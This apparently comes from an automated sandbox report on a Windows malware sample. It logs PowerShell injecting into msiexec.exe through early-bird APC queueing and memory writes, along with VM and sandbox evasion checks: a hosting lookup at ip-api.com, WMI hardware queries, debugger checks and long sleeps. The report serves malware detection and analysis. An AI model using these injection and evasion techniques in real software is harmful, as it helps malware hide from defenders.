Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\conhost.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior

Malware Analysis System Evasion

Check if machine is in data center or colocation facility

Source: global traffic

HTTP traffic detected: GET /line/?fields=hosting HTTP/1.1Host: ip-api.comConnection: Keep-Alive

Queries sensitive network adapter information (via WMI, Win32_NetworkAdapter, often done to detect virtual machines)

Source: C:\Windows\SysWOW64\msiexec.exe

WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_NetworkAdapterConfiguration

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Thread delayed: delay time: 600000	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Thread delayed: delay time: 599875	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Thread delayed: delay time: 599765	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Thread delayed: delay time: 599656	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Thread delayed: delay time: 599547	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Thread delayed: delay time: 599437	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Thread delayed: delay time: 599315	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Thread delayed: delay time: 599187	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Thread delayed: delay time: 599058	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Thread delayed: delay time: 598951	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Thread delayed: delay time: 598844	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Thread delayed: delay time: 598734	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Thread delayed: delay time: 598625	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Thread delayed: delay time: 598515	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Thread delayed: delay time: 598406	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Thread delayed: delay time: 598282	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Thread delayed: delay time: 598156	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Thread delayed: delay time: 598043	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Thread delayed: delay time: 595656	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Thread delayed: delay time: 595547	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Thread delayed: delay time: 595437	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Thread delayed: delay time: 595328	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Thread delayed: delay time: 595218	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Thread delayed: delay time: 595083	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Thread delayed: delay time: 594861	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Thread delayed: delay time: 594703	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Thread delayed: delay time: 594593	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Thread delayed: delay time: 594479	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Thread delayed: delay time: 594359	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Thread delayed: delay time: 594250	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Thread delayed: delay time: 594141	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Thread delayed: delay time: 594031	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Thread delayed: delay time: 593922	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Thread delayed: delay time: 593812	Jump to behavior

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 6008			Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 3705			Jump to behavior

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 5660	Thread sleep time: -4611686018427385s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe TID: 7824	Thread sleep time: -27670116110564310s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe TID: 7824	Thread sleep time: -600000s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe TID: 7828	Thread sleep count: 2383 > 30	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe TID: 7824	Thread sleep time: -599875s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe TID: 7828	Thread sleep count: 7418 > 30	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe TID: 7824	Thread sleep time: -599765s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe TID: 7824	Thread sleep time: -599656s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe TID: 7824	Thread sleep time: -599547s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe TID: 7824	Thread sleep time: -599437s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe TID: 7824	Thread sleep time: -599315s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe TID: 7824	Thread sleep time: -599187s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe TID: 7824	Thread sleep time: -599058s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe TID: 7824	Thread sleep time: -598951s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe TID: 7824	Thread sleep time: -598844s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe TID: 7824	Thread sleep time: -598734s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe TID: 7824	Thread sleep time: -598625s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe TID: 7824	Thread sleep time: -598515s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe TID: 7824	Thread sleep time: -598406s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe TID: 7824	Thread sleep time: -598282s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe TID: 7824	Thread sleep time: -598156s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe TID: 7824	Thread sleep time: -598043s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe TID: 7824	Thread sleep time: -100000s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe TID: 7824	Thread sleep time: -99863s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe TID: 7824	Thread sleep time: -99738s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe TID: 7824	Thread sleep time: -99613s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe TID: 7824	Thread sleep time: -99488s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe TID: 7824	Thread sleep time: -99363s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe TID: 7824	Thread sleep time: -99238s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe TID: 7824	Thread sleep time: -99113s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe TID: 7824	Thread sleep time: -98988s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe TID: 7824	Thread sleep time: -98863s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe TID: 7824	Thread sleep time: -98738s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe TID: 7824	Thread sleep time: -98613s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe TID: 7824	Thread sleep time: -98488s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe TID: 7824	Thread sleep time: -98363s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe TID: 7824	Thread sleep time: -98238s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe TID: 7824	Thread sleep time: -98113s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe TID: 7824	Thread sleep time: -97988s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe TID: 7824	Thread sleep time: -97863s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe TID: 7824	Thread sleep time: -97738s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe TID: 7824	Thread sleep time: -595656s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe TID: 7824	Thread sleep time: -595547s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe TID: 7824	Thread sleep time: -595437s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe TID: 7824	Thread sleep time: -595328s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe TID: 7824	Thread sleep time: -595218s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe TID: 7824	Thread sleep time: -595083s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe TID: 7824	Thread sleep time: -594861s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe TID: 7824	Thread sleep time: -594703s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe TID: 7824	Thread sleep time: -594593s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe TID: 7824	Thread sleep time: -594479s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe TID: 7824	Thread sleep time: -594359s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe TID: 7824	Thread sleep time: -594250s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe TID: 7824	Thread sleep time: -594141s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe TID: 7824	Thread sleep time: -594031s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe TID: 7824	Thread sleep time: -593922s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe TID: 7824	Thread sleep time: -593812s >= -30000s	Jump to behavior

Source: C:\Windows\SysWOW64\msiexec.exe

WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_BaseBoard

Source: C:\Windows\SysWOW64\msiexec.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\SysWOW64\msiexec.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor

Source: C:\Windows\SysWOW64\msiexec.exe	Last function: Thread delayed
Source: C:\Windows\SysWOW64\msiexec.exe	Last function: Thread delayed

Source: C:\Users\user\Desktop\Nt8BLNLKN7.exe	Code function: 0_2_00402645 FindFirstFileA,	0_2_00402645
Source: C:\Users\user\Desktop\Nt8BLNLKN7.exe	Code function: 0_2_00405FF5 FindFirstFileA,FindClose,	0_2_00405FF5
Source: C:\Users\user\Desktop\Nt8BLNLKN7.exe	Code function: 0_2_004055B1 CloseHandle,DeleteFileA,lstrcatA,lstrcatA,lstrlenA,FindFirstFileA,FindNextFileA,FindClose,	0_2_004055B1

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Thread delayed: delay time: 600000	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Thread delayed: delay time: 599875	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Thread delayed: delay time: 599765	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Thread delayed: delay time: 599656	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Thread delayed: delay time: 599547	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Thread delayed: delay time: 599437	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Thread delayed: delay time: 599315	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Thread delayed: delay time: 599187	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Thread delayed: delay time: 599058	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Thread delayed: delay time: 598951	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Thread delayed: delay time: 598844	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Thread delayed: delay time: 598734	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Thread delayed: delay time: 598625	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Thread delayed: delay time: 598515	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Thread delayed: delay time: 598406	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Thread delayed: delay time: 598282	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Thread delayed: delay time: 598156	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Thread delayed: delay time: 598043	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Thread delayed: delay time: 100000	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Thread delayed: delay time: 99863	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Thread delayed: delay time: 99738	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Thread delayed: delay time: 99613	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Thread delayed: delay time: 99488	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Thread delayed: delay time: 99363	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Thread delayed: delay time: 99238	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Thread delayed: delay time: 99113	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Thread delayed: delay time: 98988	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Thread delayed: delay time: 98863	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Thread delayed: delay time: 98738	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Thread delayed: delay time: 98613	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Thread delayed: delay time: 98488	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Thread delayed: delay time: 98363	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Thread delayed: delay time: 98238	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Thread delayed: delay time: 98113	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Thread delayed: delay time: 97988	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Thread delayed: delay time: 97863	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Thread delayed: delay time: 97738	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Thread delayed: delay time: 595656	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Thread delayed: delay time: 595547	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Thread delayed: delay time: 595437	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Thread delayed: delay time: 595328	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Thread delayed: delay time: 595218	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Thread delayed: delay time: 595083	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Thread delayed: delay time: 594861	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Thread delayed: delay time: 594703	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Thread delayed: delay time: 594593	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Thread delayed: delay time: 594479	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Thread delayed: delay time: 594359	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Thread delayed: delay time: 594250	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Thread delayed: delay time: 594141	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Thread delayed: delay time: 594031	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Thread delayed: delay time: 593922	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Thread delayed: delay time: 593812	Jump to behavior

Source: msiexec.exe, 0000000B.00000002.2471290960.0000000007CFD000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW;
Source: msiexec.exe, 0000000B.00000002.2471290960.0000000007CFD000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW
Source: msiexec.exe, 0000000B.00000002.2471290960.0000000007CC6000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW L

Source: C:\Users\user\Desktop\Nt8BLNLKN7.exe

API call chain: ExitProcess graph end node

graph_0-3403

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

Process information queried: ProcessInformation

Jump to behavior

Source: C:\Windows\SysWOW64\msiexec.exe

Process queried: DebugPort

Jump to behavior

Source: C:\Windows\SysWOW64\msiexec.exe

Code function: 11_2_02E8D030 LdrInitializeThunk,LdrInitializeThunk,

11_2_02E8D030

Source: C:\Users\user\Desktop\Nt8BLNLKN7.exe

Code function: 0_2_0040601C GetModuleHandleA,LoadLibraryA,GetProcAddress,

0_2_0040601C

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process token adjusted: Debug			Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Process token adjusted: Debug			Jump to behavior

HIPS / PFW / Operating System Protection Evasion

Early bird code injection technique detected

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

Process created / APC Queued / Resumed: C:\Windows\SysWOW64\msiexec.exe

Jump to behavior

Queues an APC in another process (thread injection)

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

Thread APC queued: target process: C:\Windows\SysWOW64\msiexec.exe

Jump to behavior

Writes to foreign memory regions

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

Memory written: C:\Windows\SysWOW64\msiexec.exe base: 4150000

Jump to behavior

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

Process created: C:\Windows\SysWOW64\msiexec.exe "C:\Windows\SysWOW64\msiexec.exe"

Jump to behavior

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.ServiceProcess\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.ServiceProcess.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
